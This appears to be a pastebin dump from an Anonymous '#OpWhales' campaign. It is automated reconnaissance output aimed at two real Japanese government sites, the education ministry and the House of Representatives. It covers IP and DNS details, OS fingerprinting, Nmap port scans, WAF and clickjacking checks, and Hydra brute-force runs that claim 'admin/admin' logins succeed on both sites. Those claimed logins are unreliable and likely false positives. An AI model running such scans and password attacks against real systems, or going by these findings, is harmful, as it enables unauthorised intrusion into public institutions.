
Anonymous #OpWhales JTSEC full Recon #2

a guest
Jan 8th, 2018
  1. #######################################################################################################################################
  2. Hostname www.mext.go.jp ISP Unknown
  3. Continent Unknown Flag
  4. JP
  5. Country Japan Country Code JP
  6. Region Unknown Local time 09 Jan 2018 06:54 JST
  7. City Unknown Latitude 36
  8. IP Address (IPv6) 2001:240:165:1::211 Longitude 138
  9. #######################################################################################################################################
  10. [i] Scanning Site: http://202.232.190.211
  11.  
  12.  
  13.  
  14. B A S I C I N F O
  15. ====================
  16.  
  17.  
  18. [+] Site Title: 文部科学省ホームページ
  19. [+] IP address: 202.232.190.211
  20. [+] Web Server: Apache
  21. [+] CMS: Could Not Detect
  22. [+] Cloudflare: Not Detected
  23. [+] Robots File: Could NOT Find robots.txt!
  24.  
  25.  
  26.  
  27.  
  28. H T T P H E A D E R S
  29. =======================
  30.  
  31.  
  32. [i] HTTP/1.1 200 OK
  33. [i] Date: Mon, 08 Jan 2018 22:00:52 GMT
  34. [i] Server: Apache
  35. [i] Last-Modified: Mon, 08 Jan 2018 14:01:12 GMT
  36. [i] ETag: "5c813f5-cf3c-562443b13ba00"
  37. [i] Accept-Ranges: bytes
  38. [i] Content-Length: 53052
  39. [i] Connection: close
  40. [i] Content-Type: text/html
  41.  
  42. [!] IP Address : 202.232.190.211
  43. [!] Server: Apache
  44. [-] Clickjacking protection is not in place.
  45. [!] www.mext.go.jp doesn't seem to use a CMS
  46. [+] Honeypot Probabilty: 0%
  47. ----------------------------------------
  48. API count exceeded
  49. ----------------------------------------
  50.  
  51. [+] DNS Records
  52. dns-c.iij.ad.jp. (210.130.1.15) AS2497 Internet Initiative Inc. Japan
  53. dns-b.iij.ad.jp. (202.232.2.14) AS2497 Internet Initiative Inc. Japan
  54.  
  55. [+] Host Records (A)
  56. www.mext.go.jpHTTP: (202.232.190.211) AS2497 Internet Initiative Inc. Japan
  57.  
  58. [+] TXT Records
  59.  
  60. [+] DNS Map: https://dnsdumpster.com/static/map/mext.go.jp.png
  61.  
  62. [>] Initiating 3 intel modules
  63. [>] Loading Alpha module (1/3)
  64. [>] Beta module deployed (2/3)
  65. [>] Gamma module initiated (3/3)
  66. ====================================================================================
  67. RUNNING NSLOOKUP
  68. ====================================================================================
  69. ** server can't find 211.190.232.202.in-addr.arpa: NXDOMAIN
  70.  
  71. Host 211.190.232.202.in-addr.arpa. not found: 3(NXDOMAIN)
  72. ====================================================================================
  73. CHECKING OS FINGERPRINT
  74. ====================================================================================
  75.  
  76. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  77.  
  78. [+] Target is 202.232.190.211
  79. [+] Loading modules.
  80. [+] Following modules are loaded:
  81. [x] [1] ping:icmp_ping - ICMP echo discovery module
  82. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  83. [x] [3] ping:udp_ping - UDP-based ping discovery module
  84. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  85. [x] [5] infogather:portscan - TCP and UDP PortScanner
  86. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  87. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  88. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  89. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  90. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  91. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  92. [x] [12] fingerprint:smb - SMB fingerprinting module
  93. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  94. [+] 13 modules registered
  95. [+] Initializing scan engine
  96. [+] Running scan engine
  97. [-] ping:tcp_ping module: no closed/open TCP ports known on 202.232.190.211. Module test failed
  98. [-] ping:udp_ping module: no closed/open UDP ports known on 202.232.190.211. Module test failed
  99. [-] No distance calculation. 202.232.190.211 appears to be dead or no ports known
  100. [+] Host: 202.232.190.211 is down (Guess probability: 0%)
  101. [+] Cleaning up scan engine
  102. [+] Modules deinitialized
  103. [+] Execution completed.
  104.  
  105. ====================================================================================
  106. RUNNING TCP PORT SCAN
  107. ====================================================================================
  108.  
  109. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 17:16 EST
  110. Nmap scan report for 202.232.190.211
  111. Host is up (0.17s latency).
  112. Not shown: 472 filtered ports
  113. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  114. PORT STATE SERVICE
  115. 80/tcp open http
  116.  
  117. Nmap done: 1 IP address (1 host up) scanned in 7.21 seconds
  118.  
  119. ====================================================================================
  120. RUNNING INTRUSIVE SCANS
  121. ====================================================================================
  122. + -- --=[Port 21 closed... skipping.
  123. + -- --=[Port 22 closed... skipping.
  124. + -- --=[Port 23 closed... skipping.
  125. + -- --=[Port 25 closed... skipping.
  126. + -- --=[Port 53 closed... skipping.
  127. + -- --=[Port 79 closed... skipping.
  128. + -- --=[Port 80 opened... running tests...
  129. ====================================================================================
  130. CHECKING FOR WAF
  131. ====================================================================================
  132.  
  141. WAFW00F - Web Application Firewall Detection Tool
  142.  
  143. By Sandro Gauci && Wendel G. Henrique
  144.  
  145. Checking http://202.232.190.211
  146. Generic Detection results:
  147. The site http://202.232.190.211 seems to be behind a WAF or some sort of security solution
  148. Reason: Blocking is being done at connection/packet level.
  149. Number of requests: 11
  150.  
  151. ====================================================================================
  152. GATHERING HTTP INFO
  153. ====================================================================================
  154. http://202.232.190.211 [200 OK] Apache, Country[JAPAN][JP], HTTPServer[Apache], IP[202.232.190.211], JQuery[1.8.3], Script[text/javascript], Title[文部科学省ホームページ]
  155.  
  162. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  163. + -- --=[Target: 202.232.190.211:80
  164. + -- --=[Site not vulnerable to Cross-Site Tracing!
  165. + -- --=[Site not vulnerable to Host Header Injection!
  166. + -- --=[Site vulnerable to Cross-Frame Scripting!
  167. + -- --=[Site vulnerable to Clickjacking!
  168.  
  169. HTTP/1.1 405 Method Not Allowed
  170. Date: Mon, 08 Jan 2018 22:16:21 GMT
  171. Server: Apache
  172. Allow:
  173. Content-Length: 223
  174. Content-Type: text/html; charset=iso-8859-1
  175.  
  176. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  177. <html><head>
  178. <title>405 Method Not Allowed</title>
  179. </head><body>
  180. <h1>Method Not Allowed</h1>
  181. <p>The requested method TRACE is not allowed for the URL /.</p>
  182. </body></html>
  183.  
  184. HTTP/1.1 200 OK
  185. Date: Mon, 08 Jan 2018 22:16:23 GMT
  186. Server: Apache
  187. Last-Modified: Mon, 08 Jan 2018 14:01:12 GMT
  188. ETag: "5c813f5-cf3c-562443b13ba00"
  189. Accept-Ranges: bytes
  190. Content-Length: 53052
  191. Content-Type: text/html
  192. ====================================================================================
  193. CHECKING HTTP HEADERS
  194. ====================================================================================
  195. + -- --=[Checking if X-Content options are enabled on 202.232.190.211...
  196.  
  197. + -- --=[Checking if X-Frame options are enabled on 202.232.190.211...
  198.  
  199. + -- --=[Checking if X-XSS-Protection header is enabled on 202.232.190.211...
  200.  
  201. + -- --=[Checking HTTP methods on 202.232.190.211...
  202.  
  203. + -- --=[Checking if TRACE method is enabled on 202.232.190.211...
  204.  
  205. + -- --=[Checking for META tags on 202.232.190.211...
  206. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
  207. <meta http-equiv="Content-Style-Type" content="text/css" />
  208. <meta http-equiv="Content-Script-Type" content="text/javascript" />
  209. <meta name="viewport" content="width=device-width" />
  210. <meta name="description" content="" />
  211. <meta name="keywords" content="" />
  212.  
  213. + -- --=[Checking for open proxy on 202.232.190.211...
  214. </div>
  215. <!--/footer_utility-->
  216. </div>
  217. <span class="footer_copyright" lang="en">Copyright (C) Ministry of Education, Culture, Sports, Science and Technology</span>
  218. </div>
  219. </div>
  220. <!-- footer_area END -->
  221.  
  222. </body>
  223. </html>
  224. + -- --=[Enumerating software on 202.232.190.211...
  225. Server: Apache
  226.  
  227. + -- --=[Checking if Strict-Transport-Security is enabled on 202.232.190.211...
  228.  
  229. + -- --=[Checking for Flash cross-domain policy on 202.232.190.211...
  230. <dd>電話番号:03-5253-4111(代表) 050-3772-4111 (IP 電話代表)</dd>
  231. <dd><a href="/new_map/index.htm">案内図</a></dd>
  232. </dl>
  233. </div><!--/footer-->
  234. <p id="copyright" xml:lang="ja" lang="en">Copyright (C) Ministry of Education, Culture, Sports, Science and Technology</p>
  235.  
  236. </div>
  237. </div>
  238. </body>
  239. </html>
  240. + -- --=[Checking for Silverlight cross-domain policy on 202.232.190.211...
  241. <dd>電話番号:03-5253-4111(代表) 050-3772-4111 (IP 電話代表)</dd>
  242. <dd><a href="/new_map/index.htm">案内図</a></dd>
  243. </dl>
  244. </div><!--/footer-->
  245. <p id="copyright" xml:lang="ja" lang="en">Copyright (C) Ministry of Education, Culture, Sports, Science and Technology</p>
  246.  
  247. </div>
  248. </div>
  249. </body>
  250. </html>
  251. + -- --=[Checking for HTML5 cross-origin resource sharing on 202.232.190.211...
  252.  
  253. + -- --=[Retrieving robots.txt on 202.232.190.211...
  254. <dd>電話番号:03-5253-4111(代表) 050-3772-4111 (IP 電話代表)</dd>
  255. <dd><a href="/new_map/index.htm">案内図</a></dd>
  256. </dl>
  257. </div><!--/footer-->
  258. <p id="copyright" xml:lang="ja" lang="en">Copyright (C) Ministry of Education, Culture, Sports, Science and Technology</p>
  259.  
  260. </div>
  261. </div>
  262. </body>
  263. </html>
  264. + -- --=[Retrieving sitemap.xml on 202.232.190.211...
  265. <dd>電話番号:03-5253-4111(代表) 050-3772-4111 (IP 電話代表)</dd>
  266. <dd><a href="/new_map/index.htm">案内図</a></dd>
  267. </dl>
  268. </div><!--/footer-->
  269. <p id="copyright" xml:lang="ja" lang="en">Copyright (C) Ministry of Education, Culture, Sports, Science and Technology</p>
  270.  
  271. </div>
  272. </div>
  273. </body>
  274. </html>
  275. + -- --=[Checking cookie attributes on 202.232.190.211...
  276.  
  277. + -- --=[Checking for ASP.NET Detailed Errors on 202.232.190.211...
  278. <title>404error:文部科学省</title>
  279. <body class="error404">
  280. <noscript><ul id="headerNoscript"><li><a href="/error/fontsize.html">文字サイズを変更する方法</a></li></ul></noscript>
  281. <dd><a href="/">トップ</a>&nbsp;&gt;&nbsp;404error</dd>
  282. <title>404error:文部科学省</title>
  283. <body class="error404">
  284. <noscript><ul id="headerNoscript"><li><a href="/error/fontsize.html">文字サイズを変更する方法</a></li></ul></noscript>
  285. <dd><a href="/">トップ</a>&nbsp;&gt;&nbsp;404error</dd>
  286.  
  287.  
  288. ====================================================================================
  289. RUNNING BRUTE FORCE
  290. ====================================================================================
  298. + -- --=[BruteX v1.7 by 1N3
  299. + -- --=[http://crowdshield.com
  300.  
  301.  
  302. ################################### Running Port Scan #################################################################################
  303.  
  304. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 17:16 EST
  305. Nmap scan report for 202.232.190.211
  306. Host is up (0.20s latency).
  307. Not shown: 25 filtered ports
  308. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  309. PORT STATE SERVICE
  310. 80/tcp open http
  311.  
  312. Nmap done: 1 IP address (1 host up) scanned in 5.40 seconds
  313.  
  314. ################################### Running Brute Force ###############################################################################
  315. + -- --=[Port 21 closed... skipping.
  316. + -- --=[Port 22 closed... skipping.
  317. + -- --=[Port 23 closed... skipping.
  318. + -- --=[Port 25 closed... skipping.
  319. + -- --=[Port 80 opened... running tests...
  320. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  321.  
  322. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-08 17:16:42
  323. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  324. [DATA] attacking http-get://202.232.190.211:80//
  325. [80][http-get] host: 202.232.190.211 login: admin password: admin
  326. [STATUS] attack finished for 202.232.190.211 (valid pair found)
  327. 1 of 1 target successfully completed, 1 valid password found
  328. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-08 17:16:48
  329. + -- --=[Port 110 closed... skipping.
  330. + -- --=[Port 139 closed... skipping.
  331. + -- --=[Port 162 closed... skipping.
  332. + -- --=[Port 389 closed... skipping.
  333. + -- --=[Port 443 closed... skipping.
  334. + -- --=[Port 445 closed... skipping.
  335. + -- --=[Port 512 closed... skipping.
  336. + -- --=[Port 513 closed... skipping.
  337. + -- --=[Port 514 closed... skipping.
  338. + -- --=[Port 993 closed... skipping.
  339. + -- --=[Port 1433 closed... skipping.
  340. + -- --=[Port 1521 closed... skipping.
  341. + -- --=[Port 3306 closed... skipping.
  342. + -- --=[Port 3389 closed... skipping.
  343. + -- --=[Port 5432 closed... skipping.
  344. + -- --=[Port 5900 closed... skipping.
  345. + -- --=[Port 5901 closed... skipping.
  346. + -- --=[Port 8000 closed... skipping.
  347. + -- --=[Port 8080 closed... skipping.
  348. + -- --=[Port 8100 closed... skipping.
  349. + -- --=[Port 6667 closed... skipping.
  350. #######################################################################################################################################
  351. Hostname www.shugiin.go.jp ISP NTT PC Communications, Inc. (AS2514)
  352. Continent Asia Flag
  353. JP
  354. Country Japan Country Code JP (JPN)
  355. Region 40 Local time 09 Jan 2018 07:32 JST
  356. Metropolis Unknown Postal Code 102-0082
  357. City Tokyo Latitude 35.685
  358. IP Address 210.136.96.36 Longitude 139.751
  359. #######################################################################################################################################
  360. [i] Scanning Site: http://210.136.96.36
  361.  
  362.  
  363.  
  364. B A S I C I N F O
  365. ====================
  366.  
  367.  
  368. [+] Site Title: �O�c�@�g�b�v�y�[�W
  369. [+] IP address: 210.136.96.36
  370. [+] Web Server: Lotus-Domino
  371. [+] CMS: Could Not Detect
  372. [+] Cloudflare: Not Detected
  373. [+] Robots File: Could NOT Find robots.txt!
  374.  
  390. [i] HTTP/1.1 302 Found
  391. [i] Server: Lotus-Domino
  392. [i] Date: Mon, 08 Jan 2018 22:57:34 GMT
  393. [i] Connection: close
  394. [i] Location: http://www.shugiin.go.jp/internet/index.nsf/html/index.htm
  395. [i] Content-Length: 0
  396. [i] Set-Cookie: Coyote-2-246088d2=3b01a8c0:0; path=/
  397. [i] HTTP/1.1 200 OK
  398. [i] Server: Lotus-Domino
  399. [i] Date: Mon, 08 Jan 2018 22:57:10 GMT
  400. [i] Connection: close
  401. [i] Last-Modified: Fri, 05 Jan 2018 03:37:57 GMT
  402. [i] Content-Type: text/html; charset=Shift_JIS
  403. [i] Content-Length: 32558
  404. [i] X-Content-Type-Option: nosniff
  405. [i] ETag: W/"MTAtODA4Qy00OTI1N0RDRDAwMDBEMDgxLTQ5MjU4MjBDMDAxM0Y0MTYtMA=="
  406. [i] Set-Cookie: Coyote-2-246088d2=3a01a8c0:0; path=/
  407.  
  408.  
  426. ====================================================================================
  427. RUNNING NSLOOKUP
  428. ====================================================================================
  429. 36.96.136.210.in-addr.arpa name = www.shugiin.go.jp.
  430.  
  431. Authoritative answers can be found from:
  432.  
  433. 36.96.136.210.in-addr.arpa domain name pointer www.shugiin.go.jp.
  434. ====================================================================================
  435. CHECKING OS FINGERPRINT
  436. ====================================================================================
  437.  
  438. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
  439.  
  440. [+] Target is 210.136.96.36
  441. [+] Loading modules.
  442. [+] Following modules are loaded:
  443. [x] [1] ping:icmp_ping - ICMP echo discovery module
  444. [x] [2] ping:tcp_ping - TCP-based ping discovery module
  445. [x] [3] ping:udp_ping - UDP-based ping discovery module
  446. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
  447. [x] [5] infogather:portscan - TCP and UDP PortScanner
  448. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
  449. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
  450. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
  451. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
  452. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
  453. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
  454. [x] [12] fingerprint:smb - SMB fingerprinting module
  455. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
  456. [+] 13 modules registered
  457. [+] Initializing scan engine
  458. [+] Running scan engine
  459. [-] ping:tcp_ping module: no closed/open TCP ports known on 210.136.96.36. Module test failed
  460. [-] ping:udp_ping module: no closed/open UDP ports known on 210.136.96.36. Module test failed
  461. [-] No distance calculation. 210.136.96.36 appears to be dead or no ports known
  462. [+] Host: 210.136.96.36 is down (Guess probability: 0%)
  463. [+] Cleaning up scan engine
  464. [+] Modules deinitialized
  465. [+] Execution completed.
  466.  
  467. ====================================================================================
  468. PINGING HOST
  469. ====================================================================================
  470. PING 210.136.96.36 (210.136.96.36) 56(84) bytes of data.
  471.  
  472. --- 210.136.96.36 ping statistics ---
  473. 1 packets transmitted, 0 received, 100% packet loss, time 0ms
  474.  
  475.  
  476. ====================================================================================
  477. RUNNING TCP PORT SCAN
  478. ====================================================================================
  479.  
  480. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 17:35 EST
  481. Nmap scan report for www.shugiin.go.jp (210.136.96.36)
  482. Host is up (0.19s latency).
  483. Not shown: 472 filtered ports
  484. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  485. PORT STATE SERVICE
  486. 80/tcp open http
  487.  
  488. Nmap done: 1 IP address (1 host up) scanned in 7.39 seconds
  489.  
  490. ====================================================================================
  491. RUNNING INTRUSIVE SCANS
  492. ====================================================================================
  493. + -- --=[Port 21 closed... skipping.
  494. + -- --=[Port 22 closed... skipping.
  495. + -- --=[Port 23 closed... skipping.
  496. + -- --=[Port 25 closed... skipping.
  497. + -- --=[Port 53 closed... skipping.
  498. + -- --=[Port 79 closed... skipping.
  499. + -- --=[Port 80 opened... running tests...
  500. ====================================================================================
  501. CHECKING FOR WAF
  502. ====================================================================================
  503.  
  512. WAFW00F - Web Application Firewall Detection Tool
  513.  
  514. By Sandro Gauci && Wendel G. Henrique
  515.  
  516. Checking http://210.136.96.36
  517. Generic Detection results:
  518. The site http://210.136.96.36 seems to be behind a WAF or some sort of security solution
  519. Reason: Blocking is being done at connection/packet level.
  520. Number of requests: 11
  521.  
  522. ====================================================================================
  523. GATHERING HTTP INFO
  524. ====================================================================================
  525. http://210.136.96.36 [302 Found] Cookies[Coyote-2-246088d2], Country[JAPAN][JP], HTTPServer[Lotus-Domino], IP[210.136.96.36], Lotus-Domino, RedirectLocation[http://www.shugiin.go.jp/internet/index.nsf/html/index.htm]
  526. http://www.shugiin.go.jp/internet/index.nsf/html/index.htm [200 OK] Cookies[Coyote-2-246088d2], Country[JAPAN][JP], HTTPServer[Lotus-Domino], IP[210.136.96.36], Lotus-Domino, MetaGenerator[MSHTML 8.00.7601.18305], Script[text/javascript], Title[�O�c�@�g�b�v�y�[�W], UncommonHeaders[x-content-type-option]
  527.  
  534. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
  535. + -- --=[Target: 210.136.96.36:80
  536. + -- --=[Site not vulnerable to Cross-Site Tracing!
  537. + -- --=[Site not vulnerable to Host Header Injection!
  538. + -- --=[Site vulnerable to Cross-Frame Scripting!
  539. + -- --=[Site vulnerable to Clickjacking!
  540.  
  541. HTTP/1.1 405 Method Not Allowed
  542. Server: Lotus-Domino
  543. Date: Mon, 08 Jan 2018 22:36:21 GMT
  544. Connection: close
  545. Pragma: no-cache
  546. Cache-Control: no-cache
  547. Expires: Mon, 08 Jan 2018 22:36:21 GMT
  548. Content-Type: text/html
  549. Content-Length: 165
  550. Set-Cookie: Coyote-2-246088d2=3b01a8c0:0; path=/
  551.  
  552.  
  553. HTTP/1.1 302 Found
  554. Server: Lotus-Domino
  555. Date: Mon, 08 Jan 2018 22:36:23 GMT
  556. Connection: close
  557. Location: http://www.shugiin.go.jp/internet/index.nsf/html/index.htm
  558. Content-Length: 0
  559. Set-Cookie: Coyote-2-246088d2=3b01a8c0:0; path=/
  560.  
  561.  
  562.  
  563.  
  564.  
  565. ====================================================================================
  566. CHECKING HTTP HEADERS
  567. ====================================================================================
  568. + -- --=[Checking if X-Content options are enabled on 210.136.96.36...
  569.  
  570. + -- --=[Checking if X-Frame options are enabled on 210.136.96.36...
  571.  
  572. + -- --=[Checking if X-XSS-Protection header is enabled on 210.136.96.36...
  573.  
  574. + -- --=[Checking HTTP methods on 210.136.96.36...
  575. HTTP/1.1 405 Method Not Allowed
  576.  
  577. + -- --=[Checking if TRACE method is enabled on 210.136.96.36...
  578.  
  579. + -- --=[Checking for META tags on 210.136.96.36...
  580.  
  581. + -- --=[Checking for open proxy on 210.136.96.36...
  591.  
  592.  
  593. + -- --=[Enumerating software on 210.136.96.36...
  594. Server: Lotus-Domino
  595. Location: http://www.shugiin.go.jp/internet/index.nsf/html/index.htm
  596.  
  597. + -- --=[Checking if Strict-Transport-Security is enabled on 210.136.96.36...
  598.  
  599. + -- --=[Checking for Flash cross-domain policy on 210.136.96.36...
  600. <HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>
  601. + -- --=[Checking for Silverlight cross-domain policy on 210.136.96.36...
  602. <HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>
  603. + -- --=[Checking for HTML5 cross-origin resource sharing on 210.136.96.36...
  604.  
  605. + -- --=[Retrieving robots.txt on 210.136.96.36...
  606. <HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>
  607. + -- --=[Retrieving sitemap.xml on 210.136.96.36...
  608. <HTML><HEAD><TITLE>Unable to Process Request</TITLE></HEAD><BODY><P>Http Status Code: 404</P><P>Reason: File not found or unable to read file</P></BODY></HTML>
  609. + -- --=[Checking cookie attributes on 210.136.96.36...
  610. Set-Cookie: Coyote-2-246088d2=3a01a8c0:0; path=/
  611.  
  612. + -- --=[Checking for ASP.NET Detailed Errors on 210.136.96.36...
  613.  
  614.  
  615. ====================================================================================
  616. /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require': cannot load such file -- nmap/program (LoadError)
  617. from /usr/lib/ruby/2.3.0/rubygems/core_ext/kernel_require.rb:55:in `require'
  618. from yasuo.rb:25:in `<main>'
  619. ====================================================================================
  620. SKIPPING FULL NMAP PORT SCAN
  621. ====================================================================================
  622. ====================================================================================
  623. RUNNING BRUTE FORCE
  624. ====================================================================================
  632. + -- --=[BruteX v1.7 by 1N3
  633. + -- --=[http://crowdshield.com
  634.  
  635.  
  636. ################################### Running Port Scan ##############################
  637.  
  638. Starting Nmap 7.60 ( https://nmap.org ) at 2018-01-08 17:36 EST
  639. Nmap scan report for www.shugiin.go.jp (210.136.96.36)
  640. Host is up (0.20s latency).
  641. Not shown: 25 filtered ports
  642. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
  643. PORT STATE SERVICE
  644. 80/tcp open http
  645.  
  646. Nmap done: 1 IP address (1 host up) scanned in 5.01 seconds
  647.  
  648. ################################### Running Brute Force ############################
  649.  
  650. + -- --=[Port 21 closed... skipping.
  651. + -- --=[Port 22 closed... skipping.
  652. + -- --=[Port 23 closed... skipping.
  653. + -- --=[Port 25 closed... skipping.
  654. + -- --=[Port 80 opened... running tests...
  655. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
  656.  
  657. Hydra (http://www.thc.org/thc-hydra) starting at 2018-01-08 17:36:16
  658. [DATA] max 1 task per 1 server, overall 1 task, 1496 login tries (l:34/p:44), ~1496 tries per task
  659. [DATA] attacking http-get://210.136.96.36:80//
  660. [80][http-get] host: 210.136.96.36 login: admin password: admin
  661. [STATUS] attack finished for 210.136.96.36 (valid pair found)
  662. 1 of 1 target successfully completed, 1 valid password found
  663. Hydra (http://www.thc.org/thc-hydra) finished at 2018-01-08 17:36:17
  664. ######################################################################################################################################